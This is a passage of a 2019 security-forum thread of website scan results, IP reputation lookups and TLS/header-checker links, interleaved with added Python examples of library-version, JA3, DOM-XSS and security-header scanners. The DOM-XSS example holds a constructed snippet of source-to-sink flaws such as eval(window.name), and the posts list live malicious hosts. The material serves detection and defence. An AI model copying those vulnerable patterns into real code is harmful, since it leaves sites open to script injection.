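    if hsts and (not m or int(m.group(1)) < MIN_HSTS_AGE):
        findings.append(f"HSTS max-age too short: {hsts}")
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RAW), ("hardened", HARDENED_RAW)):
        print(label, audit(raw) or "no findings")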
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2019, 06:00:50 PM
Various websites have issues with jQuery libraries that should be retired because of vulnerabilities;
some of these issues can be abused, e.g. in bootstrap.js

An example: hint #1: 'Bootstrap@3.3.5' has 5 known vulnerabilities (5 medium). See 'https://snyk.io/vuln/npm:bootstrap' for more information: https://webhint.io/scanner/a3b2b998-0045-489b-934f-155784c7bfcd#hint-no-vulnerable-javascript-libraries-1

We can have that info via an extension
Quote
Retire.js
bootstrap   3.3.5   Found in http://dk-advertising.com/wp-content/plugins/content-views-query-and-display-post-page/public/assets/js/cv.js?ver=2.1.3.3
Vulnerability info:
High   28236 XSS in data-template, data-content and data-title properties of tooltip/popover CVE-2019-8331   1
Medium   20184 XSS in data-target property of scrollspy CVE-2018-14041   1
Medium   20184 XSS in collapse data-parent attribute CVE-2018-14040   1
Medium   20184 XSS in data-container property of tooltip CVE-2018-14042   1
jquery   1.7.0   Found in https://ajax.googleapis.com/ajax/libs/jquery/1.7.0/jquery.min.js?ver=5.2
Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   123
Medium   2432 3rd party CORS request may execute CVE-2015-9251   1234
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution

or here online: https://retire.insecurity.today/#!/scan/531a6fa7af013314295e06229fcae3e27022551843a80ca3d0aeaaea484ed5cd

Complicating vulnerability: Directory Indexing
In the test an attempt was made to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is a common information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/      enabled  (insecure)
/wp-content/plugins/      disabled

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2019, 09:12:19 PM
Fine resources: http://www.scada-radar.com/protocol.php?protocol=BACnet/IP
This in the light of a Delphi malcode dropper like the malicious protocol.php (analysis of the Zebrocy dropper).

But the website we visit here with that scanner needs some jQuery libraries to be retired:
Quote
Retire.js
bootstrap   3.3.4   Found in http://www.scada-radar.com/js/bootstrap.min.js
Vulnerability info:
High   28236 XSS in data-template, data-content and data-title properties of tooltip/popover CVE-2019-8331   
Medium   20184 XSS in data-target property of scrollspy CVE-2018-14041   
Medium   20184 XSS in collapse data-parent attribute CVE-2018-14040   
Medium   20184 XSS in data-container property of tooltip CVE-2018-14042   
jquery   1.11.3   Found in https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js
Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   1234
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
jquery   1.8.2   Found in http://www.scada-radar.com/js/jquery_1_8_2.min.js
Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS,
and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution

only minor site improvement recommendations, 16 in all: https://webhint.io/scanner/a1cf7fd6-fd7d-4233-ba98-e17de6b6c7e1

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
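How does a Retire.js-style scan arrive at the findings quoted in the two posts above? It reads the library name and version from the script URL (or from the banner comment at the top of the file when the URL carries no version) and compares that version against a table of affected ranges. The following is an added example of that logic, my own code and not Retire.js's, webhint's or the scanned sites'. The vulnerability table is a constructed subset limited to the advisories named in those two scan outputs, with the first fixed versions as given in the CVE descriptions; the script list is constructed from the URLs in those posts, and example.invalid is a placeholder host.

```python
import re
from typing import List, Optional, Tuple

Version = Tuple[int, ...]

# Constructed table: (library, first affected, first fixed, advisory).
# Affected range is [first affected, first fixed).  Only the Bootstrap 3.x
# line is covered; 4.x has separate fix releases and is left out here.
VULNS = [
    ("jquery",    (0, 0, 0), (1, 9, 0), "CVE-2012-6708 selector interpreted as HTML"),
    ("jquery",    (0, 0, 0), (3, 0, 0), "CVE-2015-9251 3rd party CORS request may execute"),
    ("jquery",    (0, 0, 0), (3, 4, 0), "CVE-2019-11358 jQuery.extend prototype pollution"),
    ("bootstrap", (3, 0, 0), (3, 4, 0), "CVE-2018-14040/14041/14042 XSS via data-* attributes"),
    ("bootstrap", (3, 0, 0), (3, 4, 1), "CVE-2019-8331 XSS in tooltip/popover templates"),
]

# A version can be read from the script URL (separators '.', '_', '-' or '@')
# or, failing that, from the banner comment at the top of the file contents.
URL_PATTERNS = [
    (r"jquery[/_.@-]*v?(\d+)[._](\d+)[._](\d+)", "jquery"),
    (r"bootstrap[/_.@-]*v?(\d+)[._](\d+)[._](\d+)", "bootstrap"),
]
BANNER_PATTERNS = [
    (r"jQuery\s+(?:JavaScript Library\s+)?v?(\d+)\.(\d+)\.(\d+)", "jquery"),
    (r"Bootstrap\s+v?(\d+)\.(\d+)\.(\d+)", "bootstrap"),
]


def detect_library(url: str, content: str = "") -> Optional[Tuple[str, Version]]:
    """Return (library, version) or None when neither URL nor banner says."""
    for text, patterns in ((url, URL_PATTERNS), (content, BANNER_PATTERNS)):
        for pattern, name in patterns:
            m = re.search(pattern, text, re.IGNORECASE)
            if m:
                return name, tuple(int(g) for g in m.groups())
    return None


def vulnerabilities(name: str, version: Version) -> List[str]:
    """Advisories whose affected range contains this version."""
    return [advisory for lib, lo, fixed, advisory in VULNS
            if lib == name and lo <= version < fixed]


def audit(scripts):
    """scripts: iterable of (url, content) -> list of (url, label, advisories)."""
    findings = []
    for url, content in scripts:
        hit = detect_library(url, content)
        if hit is None:
            findings.append((url, "unrecognised library/version", []))
            continue
        name, version = hit
        label = name + " " + ".".join(str(n) for n in version)
        findings.append((url, label, vulnerabilities(name, version)))
    return findings


# Constructed from the script URLs in the two scan outputs above; the
# bootstrap file has no version in its URL, so its banner comment is used.
SAMPLE_SCRIPTS = [
    ("https://ajax.googleapis.com/ajax/libs/jquery/1.7.0/jquery.min.js?ver=5.2", ""),
    ("http://www.scada-radar.com/js/jquery_1_8_2.min.js", ""),
    ("http://www.scada-radar.com/js/bootstrap.min.js",
     "/*!\n * Bootstrap v3.3.4 (http://getbootstrap.com)\n */"),
    ("https://example.invalid/js/jquery-migrate.min.js?ver=1.4.1", ""),
]

if __name__ == "__main__":
    for url, label, advisories in audit(SAMPLE_SCRIPTS):
        print(label, "-", url)
        for a in advisories:
            print("   ", a)
```

Note the fourth sample: the `?ver=1.4.1` on jquery-migrate is the WordPress cache-buster, not the jQuery version, and the URL pattern deliberately refuses to read it, which is why a banner fallback (or fetching the file) is needed before a scanner can say anything about such a script.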
Title: Re: Tests and other Media topics
Post by: polonus on June 17, 2019, 10:32:30 PM
Check sites against: https://urlhaus.abuse.ch/url/209727/  detection
Version does not appear to be latest 5.2.1 - update now.  Rep. check warning -
checked at https://hackertarget.com/wordpress-security-scan/
checked IP for relations: https://www.virustotal.com/gui/ip-address/150.95.52.111/relations
checked at sucuri's: https://sitecheck.sucuri.net/results/https/blogmason.mixh.jp
checked for web app attacks, brute force attacks etc.: https://www.abuseipdb.com/check/150.95.52.111
checked against phishing lists: https://checkphish.ai/ip/150.95.52.111
submitted here: https://urlscan.io/result/fddcd2bb-841c-4c44-bbcc-a7f276c3cb73
check on IP: https://censys.io/ipv4/150.95.52.111

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2019, 12:07:11 AM
Malicious JA3 fingerprints to fingerprint SSL/TLS client applications. In the best case, you can use JA3 to identify malware traffic that is leveraging SSL/TLS.
However, mind that these fingerprints have not been tested against known good traffic yet and may cause a significant amount of FPs!

Find them here: https://sslbl.abuse.ch/ja3-fingerprints/   compare with findings here: https://urlhaus.abuse.ch/browse/

pol
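To make the fingerprint idea concrete: JA3 takes five fields from the TLS ClientHello (version, cipher suites, extensions, named groups, point formats), writes them out as decimal numbers and hashes that text with MD5, after dropping the random GREASE values browsers insert. Below is an added example of that computation, my own code and not abuse.ch's or the JA3 project's. The ClientHello values are constructed, and the blocklist is keyed on the sample's own hash as a placeholder rather than any real listing; the `classify` helper shows the allowlist-first lookup that the false-positive warning above calls for.

```python
import hashlib
from typing import Dict, List, Set

# GREASE values (RFC 8701): 0x0a0a, 0x1a1a, ..., 0xfafa.  Browsers insert them at
# random into cipher/extension/group lists, so JA3 drops them before hashing.
GREASE = {(b << 8) | b for b in range(0x0A, 0x100, 0x10)}


def ja3_string(version: int, ciphers: List[int], extensions: List[int],
               groups: List[int], point_formats: List[int]) -> str:
    """The JA3 text form: five comma-separated fields, decimal values joined by '-'."""
    def field(values: List[int]) -> str:
        return "-".join(str(v) for v in values if v not in GREASE)
    return ",".join([str(version), field(ciphers), field(extensions),
                     field(groups), field(point_formats)])


def ja3_hash(text: str) -> str:
    """JA3 fingerprints are the MD5 of the text form (a lookup key, not a security hash)."""
    return hashlib.md5(text.encode("ascii")).hexdigest()


def classify(fingerprint: str, blocklist: Dict[str, str], known_good: Set[str]) -> str:
    """Allowlist wins over blocklist: an untested fingerprint list, as the post
    warns, will otherwise flag ordinary client software as malicious."""
    if fingerprint in known_good:
        return "known-good"
    return blocklist.get(fingerprint, "unlisted")


# Constructed ClientHello values: TLS 1.2 (0x0303 = 771), a few common cipher
# suites, extensions, named groups and point formats, with GREASE sprinkled in.
SAMPLE_HELLO = dict(
    version=771,
    ciphers=[0x1A1A, 4865, 4866, 4867, 49195, 49199],
    extensions=[0x0A0A, 0, 23, 65281, 10, 11, 35, 16, 5, 13],
    groups=[0x2A2A, 29, 23, 24],
    point_formats=[0],
)

if __name__ == "__main__":
    text = ja3_string(**SAMPLE_HELLO)
    fp = ja3_hash(text)
    print(text)
    print(fp)
    # blocklist keyed on the sample's own hash: a placeholder, not a real listing
    print(classify(fp, {fp: "placeholder-family"}, set()))
    print(classify(fp, {fp: "placeholder-family"}, {fp}))
```

Because the fingerprint is over the client's TLS stack and not the destination, two unrelated programs built on the same TLS library produce the same JA3; that is the reason the list above needs checking against known-good traffic before it is used to block anything.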
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2019, 10:35:41 PM
Your browser knows all about you, all and everything.
What is going on under the hood?


Read this extensive paper by Sally Vandeven:
https://www.sans.org/reading-room/whitepapers/authentication/ssl-tls-whats-hood-34297

also read: https://en.wikipedia.org/wiki/Public-key_cryptography

And again polonus says, check and test it: http://codefromthe70s.org/certcheck.aspx

polonus

Title: Re: Tests and other Media topics
Post by: polonus on June 27, 2019, 08:22:54 AM
Mozilla makes online tracking visible.

Give those surveillance capitalistic trackers something to chew on.

See: https://trackthis.link/

It does not bring back the happy days of freebee Interwebz, like we knew it once,
the happy days before vendor lock-in came to hold us all as hostages,
but on the fringes of the existing commercial internet,
innovation will help us all against almighty Big Brother Data Grabbers.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 29, 2019, 01:26:23 PM
SSL and TLS checking:

Background read: https://isc.sans.edu/forums/diary/Psst+Your+Browser+Knows+All+Your+Secrets/16415/

Check: https://www.cdn77.com/tls-test

http://ssl-checker.online-domain-tools.com/

various tools e.g.: https://www.digicert.com/help/

Dane TLS check: https://www.huque.com/bin/danecheck

various tools here, e.g.: https://mxtoolbox.com/problem/smtp/smtp-tls

Discontinued service: https://cryptoreport.websecurity.symantec.com/

enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 05, 2019, 07:42:13 PM
Websites that frustrate the use of alternative browsers:
https://www.theregister.co.uk/2002/10/25/alternative_browser_villains_named/

Banks and Linux Browsers - a (in)compatibility oversight:
http://www.starnix.com/banks-n-browsers.html

Mozilla's browser DoH policy was attacked by regulators because it helps in circumventing UK provider filters;
Mozilla is now seen as a kind of "villain" browser by UK providers.
The only reason is that providers now have to look for alternative ways to make their content filters function.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 11, 2019, 05:01:56 PM
Privacy issues and security issues are often related.

How to scan for them?

1. Rendering as a normal browser would - extensive report:
https://webcookies.org/cookies/dmstreeremoval.com.au/27913092?662402

2. Two vulnerable and retirable jQuery libraries detected:
https://retire.insecurity.today/#!/scan/875a8bdadc0d2f7b324b9f54c858fd715e6306b13b290027a63c362f60401a12

3. Data Layer check: 2{data}  Show (2)
{
   "0": "config",
   "1": "UA-109165814-1"
}
&
{
   "0": "js",
   "1": "2019-07-11T14:12:41.413Z"
}

4. Trackers:    Track   From   To   Action   
   
-dmstreeremoval.com.au -dmstreeremoval.com.au

-dmstreeremoval.com.au -dmstreeremoval.com.au

-dmstreeremoval.com.au -dmstreeremoval.com.au

-fonts.googleapis.com -fonts.googleapis.com

- fonts.gstatic.com

5. Always consider these scan results: https://www.virustotal.com/gui/url/9fafcfbfa5bdd5456d5c525427d8808cb17b9d8c09697cafd03c5a1bbcb80903

6. Overall warnings: https://privacyscore.org/site/141978/

cache control, x-frame-options, content-security-policy headers not set or not following best policies.
No form autocomplete settings set. source RECX Security Analyser extension results.

7. 1 out of 10 risk on https://toolbar.netcraft.com/site_report?url=https%3A%2F%2Fdmstreeremoval.com.au%2F

8. detections on IP relations: https://www.virustotal.com/gui/ip-address/162.243.29.224/relations

9. Mainly check for cloaking and weird redirects, not here: http://isithacked.com/check/https%3A%2F%2Fdmstreeremoval.com.au%2F

10. DOM-XSS results:
Quote
Results from scanning URL: -https://dmstreeremoval.com.au
Number of sources found: 4
Number of sinks found: 249

Results from scanning URL: -https://dmstreeremoval.com.au/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 32
Number of sinks found: 13

Results from scanning URL: -https://dmstreeremoval.com.au/wp-content/plugins/photoswipe-masonry/photoswipe-masonry.js?ver=4.9.8
Number of sources found: 14
Number of sinks found: 4

Results from scanning URL: -https://dmstreeremoval.com.au/wp-content/plugins/photoswipe-masonry/photoswipe-dist/photoswipe-ui-default.min.js?ver=4.9.8
Number of sources found: 12
Number of sinks found: 2

Results from scanning URL: -https://dmstreeremoval.com.au/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4
Number of sources found: 44
Number of sinks found: 33

Results from scanning URL: -https://dmstreeremoval.com.au/wp-content/plugins/kiwi-logo-carousel/third-party/jquery.bxslider/jquery.bxslider.js?ver=4.9.8
Number of sources found: 12
Number of sinks found: 12

11. Also a scan for the PHP driven WordPress CMS at https://hackertarget.com/wordpress-security-scan/
Reputation Check
PASSED
Google Safe Browse: OK
Spamhaus Check: OK
Abuse CC: OK
Dshield Blocklist: OK
Cisco Talos Blacklist: OK
Web Server:
Apache/2.4.6
X-Powered-By:
PHP/7.1.8
IP Address:
-162.243.29.224
Hosting Provider:
DigitalOcean 
Shared Hosting:
276 sites found on -162.243.29.224

12. Outdated software on the webserver and for WordPress and missing security headers qualified as a High Risk site at:
https://sitecheck.sucuri.net/results/https/dmstreeremoval.com.au

13. Total of 13 direct threats detected here: https://app.upguard.com/webscan#/https://dmstreeremoval.com.au
Security Checks for -https://dmstreeremoval.com.au
Quote
(2) Vulnerabilities can be uncovered more easily
(4) Susceptible to man-in-the-middle attacks
Vulnerabilities
(2) Emails can be fraudulently sent
(3) Unnecessary open ports
DNS is susceptible to man-in-the-middle attacks

14. https://urlscan.io/result/9cf81b77-d79f-4aa5-9d65-ce5be4f715c8

Verdict: non-malicious, non-suspicious site, but outdated software and server software, so a High Risk website,
with various security issues and best policies missing from the implementation. Looks good, less secure.
Security is often a last-resort thing in developing and also in maintaining websites.

Enjoy checking your websites, folks,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
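The source and sink counts in item 10 come from pattern matching over each script: a "source" is a place where attacker-influenced input enters (the URL fragment, the referrer, window.name), a "sink" is a place where a string becomes markup or code (innerHTML, document.write, eval, and for old jQuery even the $() selector, per CVE-2012-6708 in the Retire.js output earlier). Here is an added example of that counting logic, my own code and not the DOM-XSS scanner's, run over a constructed snippet; the scan also flags lines where both appear together, which is only a crude stand-in for the variable tracking a real scanner does.

```python
import re
from typing import Dict, List

# Attacker-influenced inputs a script may read (DOM XSS "sources").
SOURCE_RE = re.compile(
    r"\b(?:location\.(?:hash|search|href)|document\.(?:URL|referrer|cookie)|window\.name)\b")

# Places where a string becomes markup or code (DOM XSS "sinks").  jQuery's $()
# is listed because old versions treat a selector as HTML (CVE-2012-6708 above).
SINK_RE = re.compile(
    r"(?:\.(?:innerHTML|outerHTML)\s*=|document\.write(?:ln)?\s*\(|\beval\s*\(|"
    r"\bFunction\s*\(|\$\s*\(|\.html\s*\(|set(?:Timeout|Interval)\s*\(\s*['\"])")


def scan_js(code: str) -> Dict[str, object]:
    """Count sources and sinks and list lines where both appear together.
    Same-line co-occurrence is a crude proxy for a tainted flow; a real scanner
    follows the value through variables and function calls."""
    sources = sinks = 0
    same_line: List[int] = []
    for lineno, line in enumerate(code.splitlines(), 1):
        s = len(SOURCE_RE.findall(line))
        k = len(SINK_RE.findall(line))
        sources += s
        sinks += k
        if s and k:
            same_line.append(lineno)
    return {"sources": sources, "sinks": sinks, "same_line_flows": same_line}


# Constructed snippet: lines 3, 4 and 6 pass a source straight into a sink;
# lines 1 and 2 do the same through a variable, which this crude scan does not
# connect; line 5 writes text rather than markup and is safe.
SAMPLE_JS = """\
var q = location.hash.substring(1);
document.getElementById('out').innerHTML = q;
$(location.hash);
document.write('<img src="' + document.referrer + '">');
el.textContent = location.search;
eval(window.name);
"""

if __name__ == "__main__":
    print(scan_js(SAMPLE_JS))
```

A high sink count on its own (249 on the front page above) says little; it is a sink reached by a source that matters, and the minified jQuery plugins in the listing contribute sinks simply because they build markup internally.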
Title: Re: Tests and other Media topics
Post by: polonus on July 22, 2019, 05:15:45 PM
Checking a particular IP. Where we found it: https://urlquery.net/report/63564530-782e-4486-8c90-6b86f60b1514
Re: https://www.abuseipdb.com/whois/217.160.0.127
Re: https://dnslytics.com/ip/217.160.0.127
Re: https://checkphish.ai/ip/217.160.0.127
Re: https://www.maltiverse.com/ip/217.160.0.127 & https://www.reverse.it/sample/6dd77fce803eea862d81de51f28e214d71c8f23296f389e6d17ba7c41fccc58f?environmentId=100
Detections on relations here: https://www.virustotal.com/gui/ip-address/217.160.0.127/relations

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 25, 2019, 12:24:44 AM
Rather specific and fully random source: https://libraryofbabel.info/
A treat for full encryption lovers. See for instance: https://libraryofbabel.info/anglishize.cgi?

Info credits go to Sabroni at https://forums.theregister.co.uk/forum/all/2019/07/23/us_encryption_backdoor/

When nobody has full encryption only cybercriminals will have. Think of it, folks.
Do you want to hand over your general key(s), please  :(

polonus


Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2019, 09:56:22 AM
Resource Blocked Servers: https://www.blockedservers.com/
because of http://gladesoft.com:8080/logs & https://urlhaus.abuse.ch/url/223109/ etc.
10 red out of 10 Netcraft risk: https://toolbar.netcraft.com/site_report?url=http%3A%2F%2F218.61.16.142
7 detected URLs: https://www.virustotal.com/gui/ip-address/218.61.16.142/details
Blocked because associated with a trojan: Updated by 54.70.118.129 (Amazon Boardman) 1 week, 6 days ago
tcpwrapped http       Microsoft-IIS/6.0 (Chinese mainland mono-culture server).
On many block- and blacklists. Various online/offline threats: https://urlhaus.abuse.ch/host/218.61.16.142/

Another example: https://www.blockedservers.com/blocked/ipv4/51.77.95.123/  status clear
See: https://urlhaus.abuse.ch/url/223102/  conflicting results?

More resources, for Africa: https://threathaus.com/browse 

For Mirai: https://mirai.security.gives/index.php?search=109.97.51.62
&  http://sanyalnet-cloud-vps.freeddns.org/mirai-ips.txt
Poor Roque: https://raw.githubusercontent.com/ktsaou/blocklist-ipsets/master/ciarmy.ipset

Also consider: https://nl.ipshu.com/whois_ipv4/115.193.112.213 (random example)
also found here: https://malwareworld.com/textlists/suspiciousIPs.txt
and here: https://raw.githubusercontent.com/ktsaou/blocklist-ipsets/master/alienvault_reputation.ipset
and http://server3.pubres.cz/webalizer/webalizer.current
Compare: https://www.joesandbox.com/analysis/49409/0/html#domains
and https://www.abuseipdb.com/check/37.21.44.76
See: https://github.com/zabojcaspamu/spamassassin_rules/blob/master/local.cf.BL.ZABOJCASPAMU

Various resources: https://zeltser.com/malicious-ip-blocklists/


polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2019, 07:42:32 PM
Address still launching malware:
Quote
2019-08-08 17:27:05   -http://patogh-7f.rozblog.c ...   79.127.127.68   IR   JS/CoinMiner.AHpotentiallyunwantedapplication
Re: https://otx.alienvault.com/indicator/ip/79.127.127.68  &  https://www.threatminer.org/host.php?q=79.127.127.68

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2019, 08:41:05 PM
Check on scams: http://www.scamfoo.com/site/pumafenty.com/
and
https://www.scamadviser.com/check-website/pumafenty.com

Further IP checkers: https://www.abuseipdb.com/whois/104.28.16.62
https://checkphish.ai/ip/104.28.16.62
-https://support.clean-mx.com/clean-mx/viruses.php?netname=CLOUDFLARENET&sort=id%20asc&response=alive  (alerted by avast)
https://any.run/report/6e99730c1ce658125d7d181f9a6cc5aade8377ec1998d13af26515d99771ced8/1ff01ffc-7535-4100-af05-90d90ce933e8
https://www.malwareurl.com/listing.php?as=AS13335&active=off&view=all
https://www.hybrid-analysis.com/sample/14d82c8e39c2763c3b615f78b990e8ab058c55bf903ecda5f02cc1c98e19e991?environmentId=100

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 12, 2019, 12:00:03 AM
website checks and crypt check:
https://urlscan.io/result/49f31b2f-0b76-4977-973c-131aa0124576/
https://urlscan.io/domain/www.esri.com
https://securityheaders.com/?q=www.esri.com&followRedirects=on
https://observatory.mozilla.org/analyze/www.esri.com#third-party & https://observatory.mozilla.org/analyze/www.esri.com
https://tls.imirhil.fr/https/www.esri.com
https://webhint.io/scanner/d4503ab6-e6ba-4664-8cd8-c00794392d9f#category-Security
Retire.js
jquery   1.12.4   Found in -https://www.esri.com/etc/clientlibs/esri-sites/components.a85066077ee6f134710aeddea8215009.js
Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   

A parser-blocking, cross site (i.e. different eTLD+1) script, <URL>, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See <URL> for more details. On Avast Secure Browser with Shift + Ctrl + I.
Why? Read here: https://developers.google.com/web/updates/2016/08/removing-document-write

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 13, 2019, 10:39:08 AM
More security header scans online:
https://www.immuniweb.com/websec/
https://tools.geekflare.com/secure-headers-test
https://hackertarget.com/http-header-check/
https://securityheaders.com/
https://httpsecurityreport.com/
Background read: https://csp.withgoogle.com/docs/index.html

enjoy, my friends, enjoy

polonus
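What do the header scanners listed above actually check? Each looks at the response headers for a handful of browser-enforced policies (HSTS, CSP, framing, MIME sniffing, referrer leakage, caching) and for version disclosure. The following is an added example of such an audit, my own code rather than any of those services' scoring logic; the grade scale is a constructed one, not securityheaders.com's, and the two sample responses are constructed, the weak one modelled on the Apache/PHP WordPress report earlier in the thread. It also checks for the CSP mixed-content directives that the Chrome 81 discussion further down concerns.

```python
import re
from typing import Dict, List

# Minimum HSTS max-age commonly demanded by scanners and preload lists: 180 days.
HSTS_MIN_AGE = 15552000


def _csp_directives(csp: str) -> Dict[str, List[str]]:
    """Parse "a b c; d e" into {"a": ["b", "c"], "d": ["e"]}."""
    out: Dict[str, List[str]] = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            out[tokens[0].lower()] = tokens[1:]
    return out


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return findings for one HTTP response; an empty list means nothing to report."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("Strict-Transport-Security missing")
    else:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        if not m or int(m.group(1)) < HSTS_MIN_AGE:
            findings.append("Strict-Transport-Security max-age below 180 days")

    csp = h.get("content-security-policy")
    frame_ancestors = None
    if csp is None:
        findings.append("Content-Security-Policy missing")
    else:
        d = _csp_directives(csp)
        script_src = d.get("script-src", d.get("default-src", []))
        if not script_src:
            findings.append("CSP has neither script-src nor default-src")
        elif "'unsafe-inline'" in script_src or "*" in script_src:
            findings.append("CSP script-src allows inline or wildcard scripts")
        if "upgrade-insecure-requests" not in d and "block-all-mixed-content" not in d:
            findings.append("CSP does not address mixed (http on https) content")
        frame_ancestors = d.get("frame-ancestors")

    if frame_ancestors is None and "x-frame-options" not in h:
        findings.append("no clickjacking protection (X-Frame-Options / frame-ancestors)")
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing")
    if "referrer-policy" not in h:
        findings.append("Referrer-Policy missing")
    if "no-store" not in h.get("cache-control", "").lower():
        findings.append("Cache-Control lacks no-store (fine for static pages, not for sessions)")
    for leaky in ("server", "x-powered-by"):
        if re.search(r"\d", h.get(leaky, "")):
            findings.append(f"{leaky} header discloses a version: {h[leaky]}")
    return findings


def grade(findings: List[str]) -> str:
    """Constructed scale: A for a clean response, one letter down per finding,
    F from four findings up.  Not the scale any of the online scanners use."""
    return "ABCDF"[min(len(findings), 4)]


# Constructed sample responses.  WEAK mirrors the kind of WordPress host seen
# earlier in the thread; HARDENED is the same site with the headers in place.
WEAK = {
    "Server": "Apache/2.4.6",
    "X-Powered-By": "PHP/7.1.8",
    "Content-Type": "text/html; charset=UTF-8",
}
HARDENED = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                               "frame-ancestors 'none'; upgrade-insecure-requests",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Cache-Control": "no-store",
    "Server": "Apache",
}

if __name__ == "__main__":
    for name, hdrs in (("weak", WEAK), ("hardened", HARDENED)):
        f = audit_headers(hdrs)
        print(name, grade(f), *f, sep="\n  ")
```

The X-Powered-By and Server version lines are the ones the WordPress scanners earlier in the thread read to decide "outdated software"; hiding them does not fix anything, but it removes the free inventory.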
Title: Re: Tests and other Media topics
Post by: polonus on August 15, 2019, 12:47:14 PM
Read: https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549
info credits go out to: Luan Herrera

Re: https://chromium.googlesource.com/infra/infra/+/master/appengine/monorail

Helpful here: https://unminify.com/  &  https://www.generateit.net/javascript-decompressor/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2019, 07:18:20 PM
Logging in with your facebook account, what privacy implications do you have to fear not blocking facebook?

The impact of a non-blocked visit:
https://privacyscore.org/site/143919/
& https://urlscan.io/result/5ea7f793-0c20-4fd9-8f1a-bb810babfab3

Or the consequences for your digital privacy seen here:
https://urlscan.io/result/5ea7f793-0c20-4fd9-8f1a-bb810babfab3#links

Just interesting to skim through - JavaScript behaviour on that site:
https://urlscan.io/result/5ea7f793-0c20-4fd9-8f1a-bb810babfab3#behaviour
Did not know they used babel helper (generated per session).

Better than to speculate is to let the facts speak out for themselves. info credits: luntrus

polonus (volunteer 3rd party cold recon website security analyst and website error-helper)
Title: Re: Tests and other Media topics
Post by: bob3160 on August 27, 2019, 10:00:58 PM
The best way to avoid the privacy implications that are part of Facebook,
is to never open a Facebook account. Once opened, expect to kiss your privacy bye bye.
Title: Re: Tests and other Media topics
Post by: DavidR on August 27, 2019, 10:22:55 PM
The best way to avoid the privacy implications that are part of Facebook,
is to never open a Facebook account. Once opened, expect to kiss your privacy bye bye.

Guess why I have given social networking and the like a wide berth since they first appeared ;)
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2019, 04:13:25 PM
Super Logout online: http://kapat.org/

Intel search engine, made by Peter Kleissner, the sinkhole expert.

Polonus was trained in automatic sinkholing expertise online by Peter Kleissner, now head of Intelligence X
Re: https://intelx.io/?did=d4a06454-081c-45be-9ed2-9329499c5e89
and see how we reached that super logout tool...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 07, 2019, 08:30:22 PM
Coming to USA Firefox now:
DoH: https://blog.mozilla.org/futurereleases/2019/09/06/whats-next-in-making-dns-over-https-the-default/
Advantages and disadvantages.
See Client Support: https://en.wikipedia.org/wiki/DNS_over_HTTPS

This all to battle against abuse of unencrypted DNS request connections.

Why this is not such a good idea for end-users:
1) Concentrating all DoH requests with a small group of external players (like CloudFlare, Google) will mean an enhanced privacy risk for a large number of Internet users, because the mentioned players will know exactly, for a great number of Internet users, when and what websites they visit. Censorship and downgrading of certain websites is not unthinkable. From a privacy viewpoint it would be a good thing if one could have many more DoH providers to choose from, but then blacklisting will be more of a problem, because:

2) Local DNS logging no longer takes place at firm level. Of course such logging means an enhanced risk, but it will enable you to detect compromised devices within your network;

3) DoH will raise demand for TLS interception considerably, and the risks thereof outbalance the overall profit.

(info credits: Erik van Straaten).

Using Pi-hole in such a setting makes you dependent on just one single DoH provider. What about virtual hosts on one IP address?

